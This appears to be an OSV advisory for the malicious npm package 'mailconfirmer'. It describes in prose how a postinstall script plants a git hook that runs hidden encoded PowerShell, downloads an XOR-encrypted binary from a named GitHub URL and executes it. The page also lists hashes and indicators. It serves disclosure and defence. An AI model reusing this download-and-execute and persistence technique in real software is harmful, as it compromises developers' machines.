MAL-2026-5750

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mailconfirmer/MAL-2026-5750.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5750

Published

2026-06-13T21:10:40Z

Modified

2026-06-13T21:46:45.607951836Z

Summary

Malicious code in mailconfirmer (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (fbadb3bfdda7f6b7d425f83f9d5007a59d92c19c75fee43181a471a5627fac7f)

The package advertises itself as an email confirmation/verification utility, but the shipped code contains no such functionality — index.js exports only a single getThemeColor function returning a color string. The real behavior is in install-hook.js, executed via the postinstall lifecycle script. It writes a.git/hooks/post-checkout hook into the installer's local repository whose contents are powershell -NoP -NonI -W Hidden -Enc <base64>. The base64 blob decodes to UTF-16LE PowerShell that downloads https://github.com/Dimitrijenco/Stickynote/releases/download/v2/launcher.bin, XOR-decrypts the response with key 0x42, writes the result to %TEMP%\tmp.exe, executes it hidden via Start-Process -WindowStyle Hidden, sleeps, and deletes it. The dropper URL is hosted on an unrelated third-party GitHub account whose repository name (Stickynote) is unrelated to the package's stated purpose. Two layers of obfuscation (base64-encoded UTF-16LE PowerShell + XOR-encrypted payload) are used to hide both the destination and the executed bytes. The persistence mechanism — a git post-checkout hook — re-triggers the download-and-execute path on every future git checkout in any repository where the package was installed, surviving package uninstall.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006411",
            "versions": [
                "3.2.36"
            ],
            "sha256": "ab3cad84eca57c86cc11c7bdd3e072acac609d4f034da4f5c72b38461167ee78",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:48Z",
            "import_time": "2026-06-13T21:32:33.762548026Z"
        },
        {
            "id": "IN-MAL-2026-006407",
            "versions": [
                "3.3.11"
            ],
            "sha256": "de9ef8c8cab85ca4e823488834021667649cf2de0712bf45f5e8018160b4263f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:42Z",
            "import_time": "2026-06-13T21:32:33.619539023Z"
        },
        {
            "id": "IN-MAL-2026-006405",
            "versions": [
                "3.3.12"
            ],
            "sha256": "e52f457c75436cfdff28cbf77522b7fd1e8c4470cee05d2058b6dbb3ad3c9adb",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:40Z",
            "import_time": "2026-06-13T21:32:33.548397829Z"
        },
        {
            "id": "IN-MAL-2026-006410",
            "versions": [
                "3.2.34"
            ],
            "sha256": "eede6f1c9fae38c807231ada52a36f68c02665da89e136a5067c7b2fbd2e278d",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:44Z",
            "import_time": "2026-06-13T21:32:33.730505728Z"
        },
        {
            "id": "IN-MAL-2026-006406",
            "import_time": "2026-06-13T21:32:33.586759588Z",
            "sha256": "fa2d157af30e6767ee02f791a0371ca0be7f3f9d4e8b3ebb949ef7f7c0b3a1aa",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:41Z",
            "versions": [
                "3.2.38"
            ]
        },
        {
            "id": "IN-MAL-2026-006408",
            "versions": [
                "3.2.35"
            ],
            "sha256": "fbadb3bfdda7f6b7d425f83f9d5007a59d92c19c75fee43181a471a5627fac7f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:43Z",
            "import_time": "2026-06-13T21:32:33.650159998Z"
        },
        {
            "id": "IN-MAL-2026-006409",
            "versions": [
                "3.2.35"
            ],
            "sha256": "b407412bea355d5ff296e45c1b9fc4afdcd20624f98a8bf3f32cb37ef64b2f41",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:43Z",
            "import_time": "2026-06-13T21:32:33.693842334Z"
        },
        {
            "id": "IN-MAL-2026-006404",
            "import_time": "2026-06-13T21:32:33.500761473Z",
            "sha256": "d66737fba6d2c0034f50352ebfa965356b9f75500f2adc19833be3628b7b9430",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:40Z",
            "versions": [
                "3.3.13"
            ]
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / mailconfirmer

Package

Name: mailconfirmer; View open source insights on deps.dev
Purl: pkg:npm/mailconfirmer

Affected ranges

Affected versions

3.*

3.2.34

3.2.35

3.2.36

3.2.38

3.3.11

3.3.12

3.3.13

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mailconfirmer/MAL-2026-5750.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "install-hook.js",
            "sha256": "eff924265960cb90e5cb7da874a3ebc2312f2b9acf0d628fd405f2e728efa01c",
            "tlsh": "8761e03d8a75fdd043aeb2d05d3a3f0b10985f13a7b9656ce5d205e82824a85ef3a19c"
        },
        {
            "path": "package.json",
            "sha256": "9047c1a0243416cff52f590db440dfaad432c5d85dcb54bb790164dd47b33daa",
            "tlsh": "f9e02053cf48159339f64bf75c1b51467eb20b6f14105d06397350544750b726f2bf19"
        }
    ],
    "package_integrity": [
        {
            "filename": "mailconfirmer-3.2.36.tgz",
            "hashes": {
                "sha512_sri": "sha512-wWm4gSdpiiRlUkHTFAKPliQdEF/wrLYCqEYy/EfQsYBcW+Anck2DTxlHCyk5sL8lfarsXJlnbfpIuoSCMTnBmA==",
                "sha1": "c9bcac06168b4181c17df5768652489080c50da1"
            }
        }
    ],
    "ips": [
        "151.101.192.223",
        "140.82.112.3",
        "185.199.108.133",
        "185.199.109.133",
        "151.101.64.223",
        "151.101.0.223"
    ]
}